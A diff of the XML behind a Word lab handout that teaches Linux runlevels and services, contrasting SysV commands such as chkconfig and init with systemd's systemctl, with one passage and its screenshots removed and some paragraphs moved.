-        <w:t xml:space="preserve">SysV uses a utility </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">called </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t>chkconfig</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">, but it is not always part of the default installation.  The systemd utilities do not support the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t>chkconfig</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> command, so we won’t be able to use it here.</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">  In addition to maintaining the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>rc.d</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> directories</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t>chkconfig</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> --list</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> will also list the services on the VM (not supported in Ubuntu on systemd, though).</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">The SysV command to show the current </w:t>
-      </w:r>
-      <w:r>
-        <w:t>run level</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> is </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t>runlevel</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">.  It is supported by systemd, so go ahead and execute it.  It will show you the equivalent RedHat </w:t>
-      </w:r>
-      <w:r>
-        <w:t>run level</w:t>
-      </w:r>
-      <w:r>
-        <w:t>, 5</w:t>
-      </w:r>
-      <w:r>
-        <w:t>,</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> for the GUI level.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">The SysV command to change </w:t>
-      </w:r>
-      <w:r>
-        <w:t>run level</w:t>
-      </w:r>
-      <w:r>
-        <w:t>s</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t>init</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> or </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t>telinit</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>,</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> is supported in systemd</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> (note: it works in VMware Player 16.1.2 with Ubuntu </w:t>
-      </w:r>
-      <w:r>
-        <w:t>20.04 but</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> locks up in </w:t>
-      </w:r>
-      <w:r>
-        <w:t>VMware Player 15.1 and Ubuntu 18.04</w:t>
-      </w:r>
-      <w:r>
-        <w:t>.</w:t>
-      </w:r>
-      <w:r>
-        <w:t>)</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">  The command to change to the Ubuntu console </w:t>
-      </w:r>
-      <w:r>
-        <w:t>run level</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> would be </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t>init</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 1</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>(emergency)</w:t>
-      </w:r>
-      <w:r>
-        <w:t>,</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> or</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t>init</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 2</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> (console only).  </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t>s</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t xml:space="preserve">udo </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t>init</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t>5</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> would take you back to the GUI</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> or the old run level 5</w:t>
-      </w:r>
-      <w:r>
-        <w:t>.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">If you have the correct versions, try executing </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t>init</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t>2</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">.  Your VM will </w:t>
-      </w:r>
-      <w:r>
-        <w:t>drop</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> into a terminal-only mode.  What you will see is terminal with no GUI, like the sysadmins had in days of old.  Notice that there is no scroll bar, so something that goes off the top of the screen is gone forever.  There is no mouse</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> pointer for cutting and pasting</w:t>
-      </w:r>
-      <w:r>
-        <w:t>.  Omg, how did they manage?</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="03CA9A80" wp14:editId="498E14FC">
-            <wp:extent cx="4747565" cy="1357317"/>
-            <wp:effectExtent l="0" t="0" r="0" b="0"/>
-            <wp:docPr id="3" name="Picture 3"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="1" name=""/>
-                    <pic:cNvPicPr/>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId13"/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr>
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="4789643" cy="1369347"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">If the VM captures your mouse and will not release it, hit </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t>cntl</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t>-alt</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> to get it back.  Here’s what the console looks like.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4A9CCE06" wp14:editId="6052A0C8">
-            <wp:extent cx="4849978" cy="822838"/>
-            <wp:effectExtent l="0" t="0" r="0" b="0"/>
-            <wp:docPr id="4" name="Picture 4" descr="Shape, rectangle&#10;&#10;Description automatically generated"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="4" name="Picture 4" descr="Shape, rectangle&#10;&#10;Description automatically generated"/>
-                    <pic:cNvPicPr/>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId14"/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr>
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="4978676" cy="844673"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">Log in and </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t xml:space="preserve">use sudo </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t>init</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 5</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> to get back to the desktop.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="366FF839" wp14:editId="645F8F20">
-            <wp:extent cx="4879238" cy="2018420"/>
-            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
-            <wp:docPr id="7" name="Picture 7"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="1" name=""/>
-                    <pic:cNvPicPr/>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId15"/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr>
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
                       <a:ext cx="4902875" cy="2028198"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
@@ -1755,59 +1719,67 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:r>
+        <w:t>End of optional part &lt;/optional&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
       <w:r>
+        <w:t>Systemd basics</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">The closest systemd equivalent to </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>chkconfig</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> --list</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> from SysV is</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">systemctl list-units --type service --all.  </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:iCs/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:t>Run this command in your VM and see if you can find ssh.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
         <w:lastRenderedPageBreak/>
-        <w:t>Systemd basics</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">The closest systemd equivalent to </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:iCs/>
-        </w:rPr>
-        <w:t>chkconfig</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:iCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> --list</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> from SysV is</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:iCs/>
-        </w:rPr>
-        <w:t xml:space="preserve">systemctl list-units --type service --all.  </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:iCs/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:t>Run this command in your VM and see if you can find ssh.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
         <w:t xml:space="preserve">Note that if you use </w:t>
       </w:r>
       <w:r>
@@ -2801,66 +2773,66 @@
     </w:p>
     <w:p>
       <w:r>
+        <w:t>You can</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> c</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">hange to </w:t>
+      </w:r>
+      <w:r>
+        <w:t>“</w:t>
+      </w:r>
+      <w:r>
+        <w:t>run level 3</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">”, where </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>graphical.target</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> is not running, by using</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>systemctl isolate multi-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>user.target</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:iCs/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:t>(My VM locks up if I am running Ubuntu 18 on VMware Player 15, but works fine with Ubuntu 20 and VMware Player 16.)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
         <w:lastRenderedPageBreak/>
-        <w:t>You can</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> c</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">hange to </w:t>
-      </w:r>
-      <w:r>
-        <w:t>“</w:t>
-      </w:r>
-      <w:r>
-        <w:t>run level 3</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">”, where </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>graphical.target</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> is not running, by using</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:iCs/>
-        </w:rPr>
-        <w:t>systemctl isolate multi-</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:iCs/>
-        </w:rPr>
-        <w:t>user.target</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:iCs/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:t>(My VM locks up if I am running Ubuntu 18 on VMware Player 15, but works fine with Ubuntu 20 and VMware Player 16.)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
         <w:t>This will cause all services required by the multi-</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
@@ -3040,7 +3012,7 @@
       <w:r>
         <w:t xml:space="preserve">  </w:t>
       </w:r>
-      <w:hyperlink r:id="rId16" w:history="1">
+      <w:hyperlink r:id="rId13" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
